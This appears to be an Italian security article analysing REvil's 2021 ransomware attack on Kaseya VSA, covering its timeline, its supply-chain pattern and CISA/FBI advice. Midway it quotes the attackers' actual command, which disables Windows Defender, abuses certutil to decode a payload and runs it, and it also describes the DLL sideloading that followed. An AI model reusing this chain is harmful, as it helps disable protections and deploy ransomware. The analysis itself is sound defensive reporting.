Attacchi alla Supply Chain: il caso Kaseya
Venerdì 2 luglio è stato registrato uno degli attacchi informatici di più vasta portata dopo Solarwinds: più di 1000 le aziende hanno subito un attacco ransomware coordinato dal gruppo criminale REvil e secondo le fonti Eset sarebbero 17 i paesi coinvolti tra cui UK, USA, Sudafrica, Canada, Argentina, Messico, Nuova Zelanda e Italia.
L’APT russa rivendica l’attacco in una nota sul loro blog in cui viene specificato che “è stata effettuata un’offensiva a diversi Managed Service Provider con migliaia di server e macchine infette”.
L’entità dell’attacco ha permesso ai criminali non solo di richiedere un riscatto di $5 milioni per ogni MSP crittografato e di $50 mila per ogni cliente, ma di proporre anche un acquisto “comune” di 70 milioni di dollari in Bitcoin per pubblicare un decryptor universale in grado di sbloccare tutti i sistemi. Il gruppo ha messo a disposizione delle organizzazioni colpite un metodo di contatto per negoziare la decifratura dei file.
Il gruppo REvil, conosciuto anche come Sodokinibi, si è costruito una reputazione dopo aver estorto 11 milioni di dollari al gigante brasiliano della carne JBS e più 50 milioni di dollari al fornitore taiwanese di Apple, Quanta, a seguito di un’esfiltrazione sugli schemi di progettazione del nuovo MacBook.
Le fasi dell’attacco
Per l’attacco è stata sfruttata una vulnerabilità zero-day (CVE-2021-30116) riconosciuta nel software VSA del provider IT Kaseya che ha permesso di propagare il ransomware nelle diverse reti delle infrastrutture IT. Il prodotto di Kaseya è basato su cloud e fornisce il monitoraggio in remoto dei provider di servizi gestiti grazie ad una console per gestire gli endpoint, distribuire patch e controllare l’accesso tramite MFA.
- 2 luglio 16:00 EDT: (le 22:00 italiane) l’azienda Kaseya scopre l’attacco informatico in corso ed indica come linee guida l’immediato spegnimento dei server VSA situati in loco dai clienti e lo stop dei servizi analoghi erogati in SAAS.
- 3 Luglio 10:30 EDT: Kaseya informa le forze dell’ordine e le agenzie governative per la sicurezza informatica. In serata pubblica un tool per il rilevamento dell’attacco.
- 4 Luglio: Kaseya dichiara di voler iniziare il processo di ripristino il 5 luglio EOD.
- 5 Luglio: è atteso un aggiornamento da parte di Kaseya verso le 13:00 EDT.
- 5 Luglio: il consiglio di amministrazione di Kaseya ha stabilito che la società non è pronta per iniziare il ripristino del VSA. Questa decisione sembra portare a un ritardo nel rilascio della patch.
- 6 Luglio: entro le 12:00 EDT è attesa la pubblicazione di nuovi aggiornamenti.
La dinamica
L’attacco mira a sfruttare l’anello debole della supply chain: in questo caso il sistema di patching dei server VSA.
Il pattern d’attacco è dunque molto simile a quello visto di recente nell’attacco “Sunburst”, in cui gli attaccanti, dopo aver ottenuto l’accesso ad alcuni server Solarwinds tramite un processo di privilege escalation hanno installato una backdoor in uno script di aggiornamento di Orion.
A differenza dell’attacco a Solarwinds, in cui gli attaccanti hanno sfruttato la vulnerabilità per effettuare un’attività di spionaggio industriale nei confronti delle organizzazioni che utilizzavano Orion, nell’attacco a Kaseya gli attaccanti hanno cifrato e reso inutilizzabili i dati e le procedure contenuti all’interno dei sistemi compromessi con lo scopo di chiedere un riscatto in bitcoin/monero.
Di seguito i dettagli dell’inizializzazione dell’attacco:
Il file malevolo è stato rilasciato all’interno del Kaseya’s
TempPath
con il nome diagent.exe
. Questo appare come:c:\kworking\agent.exe
di default e può essere configurabile tramiteHKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Kaseya\Agent\<unique id>
La procedura VSA usata per il deploy del ransomware è chiamata “Kaseya VSA Agent Hot-fix”, mentre un’altra procedura è “Archive and Purge Logs”
La procedura “Kaseya VSA Agent Hot-fix” esegue quanto segue:
C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
Quando
agent.exe
viene eseguito, l’eseguibile legittimo di Windows DefenderMsMpEng.exe
e l’encryptor payload mpsvc.dll vengono estratti nel path “c:\Windows” per eseguire DLL sideloading.
Come cambia il paradigma nella scelta del target
Dopo Solarwinds, la strategia di attacco dei criminali sembra essere cambiata: concentrare risorse e capacità informatiche sulla compromissione di un solo produttore a monte della supply chain del settore del software per avere pieno accesso ai diversi utilizzatori. Ciò rappresenta un punto di svolta e di innovazione nel mondo del cybercrime.
L’effetto moltiplicativo dell’attacco è semplice e intuitivo: compromettere la tecnologia software utilizzata dal provider scalando successivamente l’attacco su decine o centinaia di clienti. Un MSP diventa così un obiettivo di alto valore poiché genererà una grande superficie di diffusione del ransomware con un effetto worm senza che le aziende debbano agire in alcun modo.
Le organizzazioni criminali posseggono ormai dipartimenti dedicati alla ricerca delle vulnerabilità nei prodotti: gli attacchi non sono più mirati ad una specifica azienda target ma ad una tecnologia comune che riesca ad impattare migliaia di vittime, aggirando varie policy di sicurezza, poiché l’attacco viene introdotto da un elemento trusted. Nel dark web le vulnerabilità 0day più interessanti vengono acquistate attorno ai 2-5 milioni di dollari con un ritorno sull’investimento, nel caso di Kaseya e i 70 milioni, potenzialmente infinito.
Rimanere aggiornati non basta più
La CISA, l’agenzia per la Cybersecurity, è subito intervenuta condividendo gli indicatori di compromissione IoC per rilevare il ransomware e invita ad installare la patch (quando sarà resa disponibile), in seguito alla quale sarà necessario un ravvio dei server VSA.
Difendersi da questo genere di attacchi sembra sempre più complesso. Una possibile soluzione potrebbe essere quella di adottare una politica di “zero trust” ovvero di non fidarsi di niente e di nessuno, ma ciò è quasi impossibile nella maggior parte delle realtà aziendali, soprattutto quelle di grandi dimensioni.
Per ora, le raccomandazioni arrivano da CISA ed FBI. Le due agenzie consigliano agli MSP interessati dall’attacco di:
- Scaricare lo strumento di rilevamento per il VSA Kaseya. Questo strumento analizza il server o l’endpoint gestito e determina se sono presenti indicatori di compromissione (IoC);
- Abilitare l’autenticazione a più fattori (MFA) su ogni singolo account e per tutti i servizi rivolti ai clienti;
- Limitare le funzionalità di monitoraggio e gestione remota (RMM);
- Inserire le interfacce amministrative di RMM dietro una rete privata virtuale (VPN) o un firewall in una rete amministrativa dedicata.
Ai clienti dei Managed Service Provider coinvolti si raccomanda di intraprendere azioni immediate per implementare le seguenti best practice:
- Assicurarsi che i backup siano aggiornati e correttamente archiviati;
- Utilizzare un processo manuale di gestione delle patch;
- Implementare un principio del least priviligies per gli account amministrativi.